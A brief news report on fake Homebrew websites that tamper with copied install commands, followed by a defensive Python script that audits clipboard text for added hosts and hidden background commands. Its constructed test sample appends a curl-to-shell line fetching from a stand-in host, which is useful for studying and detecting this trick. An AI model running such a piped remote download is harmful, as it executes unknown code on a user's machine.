Cybercriminals are targeting macOS users through fake Homebrew package manager websites that look identical to the real thing. The attackers created convincing replicas of brew.sh using domains like homebrewfaq.org and homebrewclubs.org.
When users visit these spoofed sites to install Homebrew, hidden JavaScript code manipulates their clipboard without permission. Instead of copying just the legitimate installation command, the fake "Copy" button secretly adds malicious code that downloads additional payloads from attacker-controlled servers.
The scam is particularly clever because it runs malicious commands in the background while the real Homebrew installation proceeds normally, making detection difficult. This represents a new twist on supply chain attacks by targeting the installation process rather than compromising official repositories.
Source: Cybersecurity News
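
A defensive check for the clipboard tampering described above, as an added example that is not from the article or from the Homebrew project: it compares copied text with the official install one-liner and reports anything extra. The `OFFICIAL` string is taken from general knowledge of brew.sh rather than from the article, the name `audit_clipboard` is hypothetical, and the tampered sample is constructed.

```python
import re
from urllib.parse import urlparse

# Install one-liner as published on brew.sh (assumption: from general knowledge,
# the article does not quote it).
OFFICIAL = ('/bin/bash -c "$(curl -fsSL '
            'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')
ALLOWED_HOSTS = {"raw.githubusercontent.com"}
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
# A lone '&' (not '&&', not part of a redirection such as '2>&1').
BACKGROUND_RE = re.compile(r"(?<![&>])&(?![&>])")


def audit_clipboard(text):
    """Return findings for copied text; an empty list means it is exactly OFFICIAL."""
    cmd = text.strip()
    if cmd == OFFICIAL:
        return []
    findings = []
    if OFFICIAL in cmd:
        extra = cmd.replace(OFFICIAL, "", 1).strip()
        findings.append(f"extra text around the official command: {extra!r}")
    else:
        findings.append("official install command not present verbatim")
    if "\n" in cmd or "\r" in cmd:
        findings.append("embedded newline: a paste would run more than one line")
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            findings.append(f"fetches from unexpected host: {host}")
    # Heuristic: drop URLs first so '&' in a query string is not counted.
    if BACKGROUND_RE.search(URL_RE.sub("", cmd)):
        findings.append("background operator '&': a command keeps running out of sight")
    return findings


if __name__ == "__main__":
    # Constructed sample: the official command with an appended background fetch.
    sample = OFFICIAL + "; curl -fsSL https://payload.example.invalid/stage | sh >/dev/null 2>&1 &"
    for finding in audit_clipboard(sample):
        print("FLAG:", finding)
```

On macOS the clipboard text can be read with `pbpaste` and passed to `audit_clipboard` before anything is pasted into a terminal.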